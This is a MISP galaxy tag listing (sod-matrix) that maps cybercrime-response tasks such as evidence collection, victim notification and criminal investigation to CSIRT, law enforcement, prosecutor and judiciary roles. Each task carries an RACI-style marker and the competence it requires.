Identification and classification of the cyber security incident/crime - Prosecutors - [S]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - Prosecutors - [S]"

Identify the type and severity of the compromise - CSIRT - [R]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - CSIRT - [R]"

Identify the type and severity of the compromise - CSIRT - [C]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - CSIRT - [C]"

Identify the type and severity of the compromise - CSIRT - [I]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - CSIRT - [I]"

Identify the type and severity of the compromise - CSIRT - [S]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - CSIRT - [S]"

Identify the type and severity of the compromise - LEA - [R]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - LEA - [R]"

Identify the type and severity of the compromise - LEA - [C]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - LEA - [C]"

Identify the type and severity of the compromise - LEA - [I]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - LEA - [I]"

Identify the type and severity of the compromise - LEA - [S]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - LEA - [S]"

Identify the type and severity of the compromise - Prosecutors - [R]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - Prosecutors - [R]"

Identify the type and severity of the compromise - Prosecutors - [C]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - Prosecutors - [C]"

Identify the type and severity of the compromise - Prosecutors - [I]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - Prosecutors - [I]"

Identify the type and severity of the compromise - Prosecutors - [S]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - Prosecutors - [S]"

Evidence collection - CSIRT - [R]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - CSIRT - [R]"

Evidence collection - CSIRT - [C]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - CSIRT - [C]"

Evidence collection - CSIRT - [I]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - CSIRT - [I]"

Evidence collection - CSIRT - [S]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - CSIRT - [S]"

Evidence collection - LEA - [R]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - LEA - [R]"

Evidence collection - LEA - [C]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - LEA - [C]"

Evidence collection - LEA - [I]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - LEA - [I]"

Evidence collection - LEA - [S]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - LEA - [S]"

Evidence collection - Prosecutors - [R]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - Prosecutors - [R]"

Evidence collection - Prosecutors - [C]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - Prosecutors - [C]"

Evidence collection - Prosecutors - [I]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - Prosecutors - [I]"

Evidence collection - Prosecutors - [S]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - Prosecutors - [S]"

Providing technical expertise - CSIRT - [R]

Technical skills

The tag is: misp-galaxy:sod-matrix="Providing technical expertise - CSIRT - [R]"

Providing technical expertise - CSIRT - [C]

Technical skills

The tag is: misp-galaxy:sod-matrix="Providing technical expertise - CSIRT - [C]"

Providing technical expertise - CSIRT - [I]

Technical skills

The tag is: misp-galaxy:sod-matrix="Providing technical expertise - CSIRT - [I]"

Providing technical expertise - CSIRT - [S]

Technical skills

The tag is: misp-galaxy:sod-matrix="Providing technical expertise - CSIRT - [S]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - CSIRT - [R]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - CSIRT - [R]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - CSIRT - [C]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - CSIRT - [C]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - CSIRT - [I]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - CSIRT - [I]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - CSIRT - [S]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - CSIRT - [S]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - LEA - [R]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - LEA - [R]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - LEA - [C]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - LEA - [C]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - LEA - [I]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - LEA - [I]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - LEA - [S]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - LEA - [S]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - Prosecutors - [R]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - Prosecutors - [R]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - Prosecutors - [C]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - Prosecutors - [C]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - Prosecutors - [I]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - Prosecutors - [I]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - Prosecutors - [S]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - Prosecutors - [S]"

Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [R]

Obligations and restrictions on information sharing; communication channels

The tag is: misp-galaxy:sod-matrix="Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [R]"

Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [C]

Obligations and restrictions on information sharing; communication channels

The tag is: misp-galaxy:sod-matrix="Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [C]"

Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [I]

Obligations and restrictions on information sharing; communication channels

The tag is: misp-galaxy:sod-matrix="Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [I]"

Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [S]

Obligations and restrictions on information sharing; communication channels

The tag is: misp-galaxy:sod-matrix="Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [S]"

Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - Prosecutors - [R]

Obligations and restrictions on information sharing; communication channels

The tag is: misp-galaxy:sod-matrix="Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - Prosecutors - [R]"

Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - Prosecutors - [C]

Obligations and restrictions on information sharing; communication channels

The tag is: misp-galaxy:sod-matrix="Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - Prosecutors - [C]"

Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - Prosecutors - [I]

Obligations and restrictions on information sharing; communication channels

The tag is: misp-galaxy:sod-matrix="Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - Prosecutors - [I]"

Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - Prosecutors - [S]

Obligations and restrictions on information sharing; communication channels

The tag is: misp-galaxy:sod-matrix="Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - Prosecutors - [S]"

Duty to inform the victim of a cybercrime - CSIRT - [R]

Obligations and restrictions on information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - CSIRT - [R]"

Duty to inform the victim of a cybercrime - CSIRT - [C]

Obligations and restrictions on information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - CSIRT - [C]"

Duty to inform the victim of a cybercrime - CSIRT - [I]

Obligations and restrictions on information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - CSIRT - [I]"

Duty to inform the victim of a cybercrime - CSIRT - [S]

Obligations and restrictions on information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - CSIRT - [S]"

Duty to inform the victim of a cybercrime - LEA - [R]

Obligations and restrictions on information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - LEA - [R]"

Duty to inform the victim of a cybercrime - LEA - [C]

Obligations and restrictions on information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - LEA - [C]"

Duty to inform the victim of a cybercrime - LEA - [I]

Obligations and restrictions on information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - LEA - [I]"

Duty to inform the victim of a cybercrime - LEA - [S]

Obligations and restrictions on information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - LEA - [S]"

Duty to inform the victim of a cybercrime - Prosecutors - [R]

Obligations and restrictions on information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - Prosecutors - [R]"

Duty to inform the victim of a cybercrime - Prosecutors - [C]

Obligations and restrictions on information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - Prosecutors - [C]"

Duty to inform the victim of a cybercrime - Prosecutors - [I]

Obligations and restrictions on information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - Prosecutors - [I]"

Duty to inform the victim of a cybercrime - Prosecutors - [S]

Obligations and restrictions on information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - Prosecutors - [S]"

Duty to inform other stakeholders/authorities (operators of vulnerable systems, data protection authorities, telecommunications authorities, etc.) - CSIRT - [R]

Obligations and rules for information sharing among communities

The tag is: misp-galaxy:sod-matrix="Duty to inform other stakeholders/authorities (operators of vulnerable systems, data protection authorities, telecommunications authorities, etc.) - CSIRT - [R]"

Duty to inform other stakeholders/authorities (operators of vulnerable systems, data protection authorities, telecommunications authorities, etc.) - CSIRT - [C]

Obligations and rules for information sharing among communities

The tag is: misp-galaxy:sod-matrix="Duty to inform other stakeholders/authorities (operators of vulnerable systems, data protection authorities, telecommunications authorities, etc.) - CSIRT - [C]"

Duty to inform other stakeholders/authorities (operators of vulnerable systems, data protection authorities, telecommunications authorities, etc.) - CSIRT - [I]

Obligations and rules for information sharing among communities

The tag is: misp-galaxy:sod-matrix="Duty to inform other stakeholders/authorities (operators of vulnerable systems, data protection authorities, telecommunications authorities, etc.) - CSIRT - [I]"

Duty to inform other stakeholders/authorities (operators of vulnerable systems, data protection authorities, telecommunications authorities, etc.) - CSIRT - [S]

Obligations and rules for information sharing among communities

The tag is: misp-galaxy:sod-matrix="Duty to inform other stakeholders/authorities (operators of vulnerable systems, data protection authorities, telecommunications authorities, etc.) - CSIRT - [S]"

Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [R]

Communication skills; communication channel

The tag is: misp-galaxy:sod-matrix="Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [R]"

Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [C]

Communication skills; communication channel

The tag is: misp-galaxy:sod-matrix="Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [C]"

Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [I]

Communication skills; communication channel

The tag is: misp-galaxy:sod-matrix="Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [I]"

Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [S]

Communication skills; communication channel

The tag is: misp-galaxy:sod-matrix="Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [S]"

Mitigation of an incident - CSIRT - [R]

Well-prepared & well-organised to react promptly in an incident

The tag is: misp-galaxy:sod-matrix="Mitigation of an incident - CSIRT - [R]"

Mitigation of an incident - CSIRT - [C]

Well-prepared & well-organised to react promptly in an incident

The tag is: misp-galaxy:sod-matrix="Mitigation of an incident - CSIRT - [C]"

Mitigation of an incident - CSIRT - [I]

Well-prepared & well-organised to react promptly in an incident

The tag is: misp-galaxy:sod-matrix="Mitigation of an incident - CSIRT - [I]"

Mitigation of an incident - CSIRT - [S]

Well-prepared & well-organised to react promptly in an incident

The tag is: misp-galaxy:sod-matrix="Mitigation of an incident - CSIRT - [S]"

Conducting the criminal investigation - LEA - [R]

Knowledge of the legal framework; decision-making skills

The tag is: misp-galaxy:sod-matrix="Conducting the criminal investigation - LEA - [R]"

Conducting the criminal investigation - LEA - [C]

Knowledge of the legal framework; decision-making skills

The tag is: misp-galaxy:sod-matrix="Conducting the criminal investigation - LEA - [C]"

Conducting the criminal investigation - LEA - [I]

Knowledge of the legal framework; decision-making skills

The tag is: misp-galaxy:sod-matrix="Conducting the criminal investigation - LEA - [I]"

Conducting the criminal investigation - LEA - [S]

Knowledge of the legal framework; decision-making skills

The tag is: misp-galaxy:sod-matrix="Conducting the criminal investigation - LEA - [S]"

Conducting the criminal investigation - Prosecutors - [R]

Knowledge of the legal framework; decision-making skills

The tag is: misp-galaxy:sod-matrix="Conducting the criminal investigation - Prosecutors - [R]"

Conducting the criminal investigation - Prosecutors - [C]

Knowledge of the legal framework; decision-making skills

The tag is: misp-galaxy:sod-matrix="Conducting the criminal investigation - Prosecutors - [C]"

Conducting the criminal investigation - Prosecutors - [I]

Knowledge of the legal framework; decision-making skills

The tag is: misp-galaxy:sod-matrix="Conducting the criminal investigation - Prosecutors - [I]"

Conducting the criminal investigation - Prosecutors - [S]

Knowledge of the legal framework; decision-making skills

The tag is: misp-galaxy:sod-matrix="Conducting the criminal investigation - Prosecutors - [S]"

Leading the criminal investigation - Judiciary - [R]

Knowledge of the incident response plan; leadership skills

The tag is: misp-galaxy:sod-matrix="Leading the criminal investigation - Judiciary - [R]"

Leading the criminal investigation - Judiciary - [C]

Knowledge of the incident response plan; leadership skills

The tag is: misp-galaxy:sod-matrix="Leading the criminal investigation - Judiciary - [C]"

Leading the criminal investigation - Judiciary - [I]

Knowledge of the incident response plan; leadership skills

The tag is: misp-galaxy:sod-matrix="Leading the criminal investigation - Judiciary - [I]"

Leading the criminal investigation - Judiciary - [S]

Knowledge of the incident response plan; leadership skills

The tag is: misp-galaxy:sod-matrix="Leading the criminal investigation - Judiciary - [S]"

Leading the criminal investigation - Prosecutors - [R]

Knowledge of the incident response plan; leadership skills

The tag is: misp-galaxy:sod-matrix="Leading the criminal investigation - Prosecutors - [R]"

Leading the criminal investigation - Prosecutors - [C]

Knowledge of the incident response plan; leadership skills

The tag is: misp-galaxy:sod-matrix="Leading the criminal investigation - Prosecutors - [C]"

Leading the criminal investigation - Prosecutors - [I]

Knowledge of the incident response plan; leadership skills

The tag is: misp-galaxy:sod-matrix="Leading the criminal investigation - Prosecutors - [I]"

Leading the criminal investigation - Prosecutors - [S]

Knowledge of the incident response plan; leadership skills

The tag is: misp-galaxy:sod-matrix="Leading the criminal investigation - Prosecutors - [S]"

In the case of disagreement, the final say for an investigation - Judiciary - [R]

Knowledge of the legal framework; decision-making skills

The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation - Judiciary - [R]"

In the case of disagreement, the final say for an investigation - Judiciary - [C]

Knowledge of the legal framework; decision-making skills

The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation - Judiciary - [C]"

In the case of disagreement, the final say for an investigation - Judiciary - [I]

Knowledge of the legal framework; decision-making skills

The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation - Judiciary - [I]"

In the case of disagreement, the final say for an investigation - Judiciary - [S]

Knowledge of the legal framework; decision-making skills

The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation - Judiciary - [S]"

In the case of disagreement, the final say for an investigation - Prosecutors - [R]

Knowledge of the legal framework; decision-making skills

The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation - Prosecutors - [R]"

In the case of disagreement, the final say for an investigation - Prosecutors - [C]

Knowledge of the legal framework; decision-making skills

The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation - Prosecutors - [C]"

In the case of disagreement, the final say for an investigation - Prosecutors - [I]

Knowledge of the legal framework; decision-making skills

The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation - Prosecutors - [I]"

In the case of disagreement, the final say for an investigation - Prosecutors - [S]

Knowledge of the legal framework; decision-making skills

The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation - Prosecutors - [S]"

Authorizing the investigation carried out by the LE - LEA - [R]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - LEA - [R]"

Authorizing the investigation carried out by the LE - LEA - [C]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - LEA - [C]"

Authorizing the investigation carried out by the LE - LEA - [I]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - LEA - [I]"

Authorizing the investigation carried out by the LE - LEA - [S]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - LEA - [S]"

Authorizing the investigation carried out by the LE - Judiciary - [R]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Judiciary - [R]"

Authorizing the investigation carried out by the LE - Judiciary - [C]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Judiciary - [C]"

Authorizing the investigation carried out by the LE - Judiciary - [I]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Judiciary - [I]"

Authorizing the investigation carried out by the LE - Judiciary - [S]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Judiciary - [S]"

Authorizing the investigation carried out by the LE - Prosecutors - [R]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Prosecutors - [R]"

Authorizing the investigation carried out by the LE - Prosecutors - [C]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Prosecutors - [C]"

Authorizing the investigation carried out by the LE - Prosecutors - [I]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Prosecutors - [I]"

Authorizing the investigation carried out by the LE - Prosecutors - [S]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Prosecutors - [S]"

Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [R]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [R]"

Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [C]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [C]"

Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [I]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [I]"

Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [S]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [S]"

Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [R]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [R]"

Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [C]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [C]"

Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [I]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [I]"

Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [S]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [S]"

Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [R]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [R]"

Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [C]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [C]"

Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [I]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [I]"

Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [S]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [S]"

Ensuring that fundamental rights are respected during the investigation and prosecution - Prosecutors - [R]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - Prosecutors - [R]"

Ensuring that fundamental rights are respected during the investigation and prosecution - Prosecutors - [C]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - Prosecutors - [C]"

Ensuring that fundamental rights are respected during the investigation and prosecution - Prosecutors - [I]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - Prosecutors - [I]"

Ensuring that fundamental rights are respected during the investigation and prosecution - Prosecutors - [S]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - Prosecutors - [S]"

Systems recovery - CSIRT - [R]

Technical skills

The tag is: misp-galaxy:sod-matrix="Systems recovery - CSIRT - [R]"

Systems recovery - CSIRT - [C]

Technical skills

The tag is: misp-galaxy:sod-matrix="Systems recovery - CSIRT - [C]"

Systems recovery - CSIRT - [I]

Technical skills

The tag is: misp-galaxy:sod-matrix="Systems recovery - CSIRT - [I]"

Systems recovery - CSIRT - [S]

Technical skills

The tag is: misp-galaxy:sod-matrix="Systems recovery - CSIRT - [S]"

Protecting the constituency - CSIRT - [R]

Drafting and establishing procedures; technical knowledge

The tag is: misp-galaxy:sod-matrix="Protecting the constituency - CSIRT - [R]"

Protecting the constituency - CSIRT - [C]

Drafting and establishing procedures; technical knowledge

The tag is: misp-galaxy:sod-matrix="Protecting the constituency - CSIRT - [C]"

Protecting the constituency - CSIRT - [I]

Drafting and establishing procedures; technical knowledge

The tag is: misp-galaxy:sod-matrix="Protecting the constituency - CSIRT - [I]"

Protecting the constituency - CSIRT - [S]

Drafting and establishing procedures; technical knowledge

The tag is: misp-galaxy:sod-matrix="Protecting the constituency - CSIRT - [S]"

Preventing and containing IT incidents from a technical point of view - CSIRT - [R]

Technical skills pertaining to system administration, network administration, technical support or intrusion detection

The tag is: misp-galaxy:sod-matrix="Preventing and containing IT incidents from a technical point of view - CSIRT - [R]"

Preventing and containing IT incidents from a technical point of view - CSIRT - [C]

Technical skills pertaining to system administration, network administration, technical support or intrusion detection

The tag is: misp-galaxy:sod-matrix="Preventing and containing IT incidents from a technical point of view - CSIRT - [C]"

Preventing and containing IT incidents from a technical point of view - CSIRT - [I]

Technical skills pertaining to system administration, network administration, technical support or intrusion detection

The tag is: misp-galaxy:sod-matrix="Preventing and containing IT incidents from a technical point of view - CSIRT - [I]"

Preventing and containing IT incidents from a technical point of view - CSIRT - [S]

Technical skills pertaining to system administration, network administration, technical support or intrusion detection

The tag is: misp-galaxy:sod-matrix="Preventing and containing IT incidents from a technical point of view - CSIRT - [S]"

Analysis and interpretation of collected evidence - LEA - [R]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - LEA - [R]"

Analysis and interpretation of collected evidence - LEA - [C]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - LEA - [C]"

Analysis and interpretation of collected evidence - LEA - [I]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - LEA - [I]"

Analysis and interpretation of collected evidence - LEA - [S]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - LEA - [S]"

Analysis and interpretation of collected evidence - Judiciary - [R]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - Judiciary - [R]"

Analysis and interpretation of collected evidence - Judiciary - [C]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - Judiciary - [C]"

Analysis and interpretation of collected evidence - Judiciary - [I]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - Judiciary - [I]"

Analysis and interpretation of collected evidence - Judiciary - [S]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - Judiciary - [S]"

Analysis and interpretation of collected evidence - Prosecutors - [R]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - Prosecutors - [R]"

Analysis and interpretation of collected evidence - Prosecutors - [C]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - Prosecutors - [C]"

Analysis and interpretation of collected evidence - Prosecutors - [I]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - Prosecutors - [I]"

Analysis and interpretation of collected evidence - Prosecutors - [S]

Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - Prosecutors - [S]"

Requesting testimonies from CSIRTs and LE - Judiciary - [R]

Testimonies in a criminal trial

The tag is: misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Judiciary - [R]"

Requesting testimonies from CSIRTs and LE - Judiciary - [C]

Testimonies in a criminal trial

The tag is: misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Judiciary - [C]"

Requesting testimonies from CSIRTs and LE - Judiciary - [I]

Testimonies in a criminal trial

The tag is: misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Judiciary - [I]"

Requesting testimonies from CSIRTs and LE - Judiciary - [S]

Testimonies in a criminal trial

The tag is: misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Judiciary - [S]"

Requesting testimonies from CSIRTs and LE - Prosecutors - [R]

Testimonies in a criminal trial

The tag is: misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Prosecutors - [R]"

Requesting testimonies from CSIRTs and LE - Prosecutors - [C]

Testimonies in a criminal trial

The tag is: misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Prosecutors - [C]"

Requesting testimonies from CSIRTs and LE - Prosecutors - [I]

Testimonies in a criminal trial

The tag is: misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Prosecutors - [I]"

Requesting testimonies from CSIRTs and LE - Prosecutors - [S]

Testimonies in a criminal trial

The tag is: misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Prosecutors - [S]"

